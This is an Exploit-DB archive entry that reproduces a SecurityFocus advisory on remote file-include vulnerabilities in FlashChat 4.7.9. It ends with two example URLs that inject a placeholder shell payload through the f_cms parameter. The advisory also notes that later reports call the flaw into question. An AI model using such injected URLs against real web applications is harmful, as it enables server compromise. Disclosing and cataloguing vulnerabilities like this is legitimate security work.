FlashChat F_CMS 4.7.9 Parameter Multiple Remote File Include Vulnerabilities

2007-05-28T00:00:00
ID EDB-ID:30092
Type exploitdb
Reporter Hasadya Raed
Modified 2007-05-28T00:00:00

Description

FlashChat F_CMS 4.7.9 Parameter Multiple Remote File Include Vulnerabilities. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/24190/info

FlashChat is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.

An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.

This issue affects FlashChat 4.7.9; other versions may also be vulnerable.

Further reports suggest that the vulnerable parameter is defined with static content. This BID will be updated pending further investigation. 

http://www.example.com/chat/incclasses/connection.php?f_cms=[Shell-Attack]
http://www.example.com/chat/inc/common.php?f_cms=[Shell-Attack]